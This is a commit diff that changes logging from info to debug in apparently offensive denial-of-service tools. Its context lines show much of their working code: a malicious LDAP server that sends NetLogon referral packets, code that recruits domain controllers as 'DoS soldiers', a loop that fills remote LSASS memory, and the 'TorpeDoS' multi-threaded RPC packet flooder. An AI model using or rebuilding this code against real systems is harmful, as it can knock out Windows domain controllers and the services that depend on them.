refactor: change logging level from info to debug for detailed tracing
This commit is contained in:
shmctl
@@ -24,13 +24,13 @@ def call_dsr_get_dc_name_ex2(target_ip: str, port: int, account: str, site_name:
|
||||
rpctransport = DCERPCTransportFactory(f'ncacn_ip_tcp:{target_ip}[{port}]')
|
||||
dce = rpctransport.get_dce_rpc()
|
||||
dce.connect()
|
||||
logger.info(f"Connected to {target_ip}:{port}")
|
||||
logger.debug(f"Connected to {target_ip}:{port}")
|
||||
|
||||
try:
|
||||
dce.bind(nrpc.MSRPC_UUID_NRPC)
|
||||
except DCERPCException:
|
||||
logger.error("Failed to bind to NRPC interface!")
|
||||
logger.info("This might be because the target is doesn't have netlogon service running.")
|
||||
logger.debug("This might be because the target is doesn't have netlogon service running.")
|
||||
raise
|
||||
|
||||
request = nrpc.DsrGetDcNameEx2()
|
||||
@@ -42,7 +42,7 @@ def call_dsr_get_dc_name_ex2(target_ip: str, port: int, account: str, site_name:
|
||||
request['SiteName'] = site_name + NULL
|
||||
request['Flags'] = 0
|
||||
|
||||
logger.info("Sending DsrGetDcNameEx2 request...")
|
||||
logger.debug("Sending DsrGetDcNameEx2 request...")
|
||||
dce.call(request.opnum, request)
|
||||
dce.disconnect()
|
||||
|
||||
@@ -88,7 +88,7 @@ def trigger_dcs_to_become_cldap_clients(
|
||||
"""
|
||||
threads = []
|
||||
for target_ip in target_ips:
|
||||
logger.info(f"Recruiting a DoS soldier {target_ip}")
|
||||
logger.debug(f"Recruiting a DoS soldier {target_ip}")
|
||||
|
||||
|
||||
thread = threading.Thread(
|
||||
@@ -235,7 +235,7 @@ def main():
|
||||
"""
|
||||
args = parse_arguments()
|
||||
|
||||
logger.info("Starting to recruit DoS soldiers")
|
||||
logger.debug("Starting to recruit DoS soldiers")
|
||||
|
||||
# Start servers
|
||||
udp_server_thread = start_udp_server(args.listen_port, args.tcp_ldap_url)
|
||||
@@ -245,7 +245,7 @@ def main():
|
||||
tcp_server_thread = start_tcp_server(args.listen_port, args.req_count, f"{str(uuid.uuid4())}.com")
|
||||
|
||||
# Wait for servers to start
|
||||
logger.info("Waiting for servers to start...")
|
||||
logger.debug("Waiting for servers to start...")
|
||||
time.sleep(2)
|
||||
|
||||
start_time = time.time()
|
||||
@@ -254,12 +254,12 @@ def main():
|
||||
trigger_dcs_to_become_cldap_clients(args.dos_soldiers, args.domain_name)
|
||||
elif args.mode == "dos":
|
||||
# Perform a single target DoS attack
|
||||
logger.info(f"Starting DoS attack on {args.target} with domain {args.domain_name}")
|
||||
logger.debug(f"Starting DoS attack on {args.target} with domain {args.domain_name}")
|
||||
while True:
|
||||
try:
|
||||
fill_remote_lsass_process_memory(args.target, args.domain_name)
|
||||
except KeyboardInterrupt:
|
||||
logger.info("Keyboard interrupt detected, stopping DoS attack")
|
||||
logger.debug("Keyboard interrupt detected, stopping DoS attack")
|
||||
break
|
||||
|
||||
# Calculate and display total execution time
|
||||
|
||||
+10
-10
@@ -61,7 +61,7 @@ def handle_connection(conn, addr, count, dos_victim_url):
|
||||
referrals = [f'ldap://{str(uuid.uuid4())}.{dos_victim_url}' for _ in range(count)]
|
||||
buffer = bytearray()
|
||||
|
||||
logger.info(f"NetLogon connected from {addr}")
|
||||
logger.debug(f"NetLogon connected from {addr}")
|
||||
|
||||
while True:
|
||||
data = conn.recv(4096)
|
||||
@@ -82,10 +82,10 @@ def handle_connection(conn, addr, count, dos_victim_url):
|
||||
del buffer[:length_consumed]
|
||||
request = ldap_message.value
|
||||
|
||||
logger.info("Received LDAP request from NetLogon")
|
||||
logger.debug("Received LDAP request from NetLogon")
|
||||
|
||||
if isinstance(request, pureldap.LDAPBindRequest):
|
||||
logger.info("Processing LDAP bind request")
|
||||
logger.debug("Processing LDAP bind request")
|
||||
|
||||
bind_response = pureldap.LDAPBindResponse(
|
||||
resultCode=0,
|
||||
@@ -98,33 +98,33 @@ def handle_connection(conn, addr, count, dos_victim_url):
|
||||
)
|
||||
response_bytes = response_message.toWire()
|
||||
|
||||
logger.info(f"Sending LDAP bind success response to {addr}")
|
||||
logger.debug(f"Sending LDAP bind success response to {addr}")
|
||||
conn.sendall(response_bytes)
|
||||
|
||||
else:
|
||||
logger.info("Processing non-bind LDAP request as malicious referral")
|
||||
logger.debug("Processing non-bind LDAP request as malicious referral")
|
||||
|
||||
vulnerable_ldap_packet = get_multi_referral_ldap_packet(ldap_message.id, referrals)
|
||||
|
||||
logger.info(f"Sending malicious LDAP response packet to {addr}")
|
||||
logger.debug(f"Sending malicious LDAP response packet to {addr}")
|
||||
conn.sendall(vulnerable_ldap_packet)
|
||||
|
||||
conn.close()
|
||||
logger.info("Connection closed")
|
||||
logger.debug("Connection closed")
|
||||
|
||||
|
||||
def run_server(listen_port: int, count: int, dos_victim_url: str):
|
||||
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
server_socket.bind(('0.0.0.0', listen_port))
|
||||
server_socket.listen(5)
|
||||
logger.info(f"TCP LDAP server listening on 0.0.0.0:{listen_port}")
|
||||
logger.debug(f"TCP LDAP server listening on 0.0.0.0:{listen_port}")
|
||||
|
||||
try:
|
||||
while True:
|
||||
conn, addr = server_socket.accept()
|
||||
threading.Thread(target=handle_connection, args=(conn, addr, count, dos_victim_url)).start()
|
||||
except KeyboardInterrupt:
|
||||
logger.info("Server shutting down due to KeyboardInterrupt")
|
||||
logger.debug("Server shutting down due to KeyboardInterrupt")
|
||||
finally:
|
||||
server_socket.close()
|
||||
logger.info("Server has been shut down.")
|
||||
logger.debug("Server has been shut down.")
|
||||
|
||||
@@ -54,12 +54,12 @@ def answer_request_with_referral(data: bytes, addr, sock: socket.socket, tcp_lda
|
||||
|
||||
# Parse the received data
|
||||
ldap_message, _ = pureber.berDecodeObject(berdecoder, data)
|
||||
logger.info(f"Received LDAP request from NetLogon {addr}")
|
||||
logger.debug(f"Received LDAP request from NetLogon {addr}")
|
||||
|
||||
# Build the "vulnerable" response packet
|
||||
referral_ldap_packet = get_referral_to_tcp_server_ldap_packet(ldap_message.id, tcp_ldap_url=tcp_ldap_url)
|
||||
|
||||
logger.info(f"Sending LDAP referral response packet to {addr}: {referral_ldap_packet}")
|
||||
logger.debug(f"Sending LDAP referral response packet to {addr}: {referral_ldap_packet}")
|
||||
# Send back to client
|
||||
sock.sendto(referral_ldap_packet, addr)
|
||||
|
||||
@@ -67,13 +67,13 @@ def answer_request_with_referral(data: bytes, addr, sock: socket.socket, tcp_lda
|
||||
def run_server(listen_port: int, tcp_ldap_url: str):
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
sock.bind(('0.0.0.0', listen_port))
|
||||
logger.info(f"Server listening on port {listen_port}")
|
||||
logger.debug(f"Server listening on port {listen_port}")
|
||||
|
||||
try:
|
||||
while True:
|
||||
data, addr = sock.recvfrom(4096)
|
||||
answer_request_with_referral(data, addr, sock, tcp_ldap_url)
|
||||
except KeyboardInterrupt:
|
||||
logger.info("Server has been shut down.")
|
||||
logger.debug("Server has been shut down.")
|
||||
finally:
|
||||
sock.close()
|
||||
|
||||
@@ -83,7 +83,7 @@ def parse_cli_arguments():
|
||||
help="Number of worker threads per stage (default: 16)"
|
||||
)
|
||||
args = parser.parse_args()
|
||||
logger.info(f"Parsed arguments: target={args.target_host}, replay_count={args.replay_count}, iterations={args.iterations}, workers={args.worker_count}")
|
||||
logger.debug(f"Parsed arguments: target={args.target_host}, replay_count={args.replay_count}, iterations={args.iterations}, workers={args.worker_count}")
|
||||
return args
|
||||
|
||||
class CustomSigningDCERPC(transport.DCERPC_v5):
|
||||
@@ -116,7 +116,7 @@ def load_packet_file(file_path):
|
||||
Raises:
|
||||
ValueError: If UUID or VERSION headers are missing in the file.
|
||||
"""
|
||||
logger.info(f"Loading packet file: {file_path}")
|
||||
logger.debug(f"Loading packet file: {file_path}")
|
||||
interface_uuid = None
|
||||
version = None
|
||||
requires_authentication = False
|
||||
@@ -125,20 +125,20 @@ def load_packet_file(file_path):
|
||||
for line in file_path.read_text().splitlines():
|
||||
if line.startswith("# UUID:"):
|
||||
interface_uuid = line.split(":", 1)[1].strip()
|
||||
logger.info(f"Found UUID: {interface_uuid}")
|
||||
logger.debug(f"Found UUID: {interface_uuid}")
|
||||
elif line.startswith("# VERSION:"):
|
||||
version = line.split(":", 1)[1].strip()
|
||||
logger.info(f"Found version: {version}")
|
||||
logger.debug(f"Found version: {version}")
|
||||
elif line.startswith("# AUTH:"):
|
||||
requires_authentication = line.split(":", 1)[1].strip().lower() == "yes"
|
||||
logger.info(f"Authentication required: {requires_authentication}")
|
||||
logger.debug(f"Authentication required: {requires_authentication}")
|
||||
elif line and not line.startswith("#"):
|
||||
packets.append(binascii.a2b_hex(line.strip()))
|
||||
|
||||
if not interface_uuid or not version:
|
||||
raise ValueError(f"Missing UUID or VERSION header in {file_path}")
|
||||
|
||||
logger.info(f"Loaded {len(packets)} packets from {file_path}")
|
||||
logger.debug(f"Loaded {len(packets)} packets from {file_path}")
|
||||
return (interface_uuid, version), requires_authentication, packets
|
||||
|
||||
def resolve_rpc_port(server_ip, interface_uuid_bin):
|
||||
@@ -152,7 +152,7 @@ def resolve_rpc_port(server_ip, interface_uuid_bin):
|
||||
Returns:
|
||||
str or None: Resolved TCP port as a string, or None if resolution fails.
|
||||
"""
|
||||
logger.info(f"Resolving RPC port for {server_ip} with UUID {interface_uuid_bin.hex()}")
|
||||
logger.debug(f"Resolving RPC port for {server_ip} with UUID {interface_uuid_bin.hex()}")
|
||||
rpc_transport = transport.DCERPCTransportFactory(f"ncacn_ip_tcp:{server_ip}[135]")
|
||||
dce = rpc_transport.get_dce_rpc()
|
||||
dce.connect()
|
||||
@@ -161,7 +161,7 @@ def resolve_rpc_port(server_ip, interface_uuid_bin):
|
||||
server_ip, interface_uuid_bin, protocol='ncacn_ip_tcp'
|
||||
)
|
||||
port = binding_string.split("[")[1].rstrip("]")
|
||||
logger.info(f"Resolved RPC port: {port}")
|
||||
logger.debug(f"Resolved RPC port: {port}")
|
||||
return port
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to resolve RPC port: {e}")
|
||||
@@ -178,7 +178,7 @@ def rpc_stateless_bind(dce, rpc_transport, iface_uuid):
|
||||
rpc_transport: Transport object for the connection.
|
||||
iface_uuid (bytes): Binary UUID of the target interface.
|
||||
"""
|
||||
logger.info(f"Initiating stateless bind for interface UUID {iface_uuid.hex()}")
|
||||
logger.debug(f"Initiating stateless bind for interface UUID {iface_uuid.hex()}")
|
||||
bind = MSRPCBind()
|
||||
ctx = dce._ctx
|
||||
item = CtxItem()
|
||||
@@ -194,7 +194,7 @@ def rpc_stateless_bind(dce, rpc_transport, iface_uuid):
|
||||
packet['call_id'] = 1
|
||||
|
||||
rpc_transport.send(packet.get_packet())
|
||||
logger.info("Stateless bind packet sent")
|
||||
logger.debug("Stateless bind packet sent")
|
||||
|
||||
def replay_packets_for_interface(
|
||||
server_ip, rpc_port, interface_info, packet_list,
|
||||
@@ -219,7 +219,7 @@ def replay_packets_for_interface(
|
||||
"""
|
||||
rpc_sessions = [] # List of (dce, transport) tuples
|
||||
signature_map = {} # socket -> list of signature bytes
|
||||
logger.info(f"Starting replay for interface {interface_info[0]}@v{interface_info[1]}, "
|
||||
logger.debug(f"Starting replay for interface {interface_info[0]}@v{interface_info[1]}, "
|
||||
f"auth={'yes' if requires_authentication else 'no'}, file={packet_filename}, "
|
||||
f"sessions={replay_count}, workers={worker_count}")
|
||||
|
||||
@@ -316,7 +316,7 @@ def replay_packets_for_interface(
|
||||
]
|
||||
try:
|
||||
sock.send(b"".join(current_packet_list))
|
||||
logger.info(f"Successfully sent {len(current_packet_list)} packets")
|
||||
logger.debug(f"Successfully sent {len(current_packet_list)} packets")
|
||||
except Exception as err:
|
||||
logger.error(f"Failed to send packets: {err}")
|
||||
with lock:
|
||||
@@ -332,7 +332,7 @@ def replay_packets_for_interface(
|
||||
worker_fn (callable): Worker function to execute.
|
||||
args (tuple): Arguments to pass to the worker function.
|
||||
"""
|
||||
logger.info(f"Starting {count} worker threads for {worker_fn.__name__}")
|
||||
logger.debug(f"Starting {count} worker threads for {worker_fn.__name__}")
|
||||
threads = [
|
||||
threading.Thread(target=worker_fn, args=args, daemon=True)
|
||||
for _ in range(count)
|
||||
@@ -341,10 +341,10 @@ def replay_packets_for_interface(
|
||||
thread.start()
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
logger.info(f"All {count} worker threads completed")
|
||||
logger.debug(f"All {count} worker threads completed")
|
||||
|
||||
# Stage 1: Establish sessions (bind)
|
||||
logger.info("Stage 1: Establishing bind sessions")
|
||||
logger.debug("Stage 1: Establishing bind sessions")
|
||||
bind_queue = Queue()
|
||||
bind_lock = threading.Lock()
|
||||
for _ in range(replay_count):
|
||||
@@ -356,11 +356,11 @@ def replay_packets_for_interface(
|
||||
(bind_queue, bind_bar, bind_lock)
|
||||
)
|
||||
bind_bar.close()
|
||||
logger.info(f"Established {len(rpc_sessions)} sessions")
|
||||
logger.debug(f"Established {len(rpc_sessions)} sessions")
|
||||
|
||||
# Stage 2: Generate signatures (if needed)
|
||||
if requires_authentication:
|
||||
logger.info("Stage 2: Generating NTLM signatures")
|
||||
logger.debug("Stage 2: Generating NTLM signatures")
|
||||
sign_queue = Queue()
|
||||
sign_lock = threading.Lock()
|
||||
for session in rpc_sessions:
|
||||
@@ -372,10 +372,10 @@ def replay_packets_for_interface(
|
||||
(sign_queue, sign_bar, sign_lock)
|
||||
)
|
||||
sign_bar.close()
|
||||
logger.info(f"Generated signatures for {len(signature_map)} sessions")
|
||||
logger.debug(f"Generated signatures for {len(signature_map)} sessions")
|
||||
|
||||
# Stage 3: Send RPC calls
|
||||
logger.info("Stage 3: Sending RPC packets")
|
||||
logger.debug("Stage 3: Sending RPC packets")
|
||||
call_queue = Queue()
|
||||
call_lock = threading.Lock()
|
||||
for _, rpc_transport in rpc_sessions:
|
||||
@@ -388,10 +388,10 @@ def replay_packets_for_interface(
|
||||
(signature_map, call_queue, call_bar, call_lock)
|
||||
)
|
||||
call_bar.close()
|
||||
logger.info(f"Completed sending packets for {len(rpc_sessions)} sessions")
|
||||
logger.debug(f"Completed sending packets for {len(rpc_sessions)} sessions")
|
||||
|
||||
# Cleanup: Disconnect sessions
|
||||
logger.info("Cleaning up: Disconnecting sessions")
|
||||
logger.debug("Cleaning up: Disconnecting sessions")
|
||||
for _, rpc_transport in rpc_sessions:
|
||||
try:
|
||||
rpc_transport.disconnect()
|
||||
@@ -403,11 +403,11 @@ def main():
|
||||
"""
|
||||
Main entry point for the TorpeDoS RPC flooder tool. Coordinates argument parsing, packet loading, port resolution, and attack execution.
|
||||
"""
|
||||
logger.info("Starting TorpeDoS RPC Flooder")
|
||||
logger.debug("Starting TorpeDoS RPC Flooder")
|
||||
start_time = datetime.now()
|
||||
args = parse_cli_arguments()
|
||||
pkt_file = Path(args.packets_file)
|
||||
logger.info(f"Packet file path: {pkt_file}")
|
||||
logger.debug(f"Packet file path: {pkt_file}")
|
||||
|
||||
interface_info, requires_auth, packets = load_packet_file(pkt_file)
|
||||
if requires_auth and not (args.username and args.password and args.domain):
|
||||
@@ -424,7 +424,7 @@ def main():
|
||||
return
|
||||
|
||||
for i in range(args.iterations):
|
||||
logger.info(f"Starting iteration {i + 1}/{args.iterations}")
|
||||
logger.debug(f"Starting iteration {i + 1}/{args.iterations}")
|
||||
replay_packets_for_interface(
|
||||
server_ip=args.target_host,
|
||||
username=args.username,
|
||||
@@ -439,11 +439,11 @@ def main():
|
||||
packet_filename=pkt_file.name
|
||||
)
|
||||
if i + 1 != args.iterations:
|
||||
logger.info(f"Waiting {args.delay_between_iterations} seconds before next iteration")
|
||||
logger.debug(f"Waiting {args.delay_between_iterations} seconds before next iteration")
|
||||
time.sleep(args.delay_between_iterations)
|
||||
|
||||
end_time = datetime.now()
|
||||
logger.info(f"Attack completed. Total duration: {end_time - start_time}")
|
||||
logger.debug(f"Attack completed. Total duration: {end_time - start_time}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in New Issue
Block a user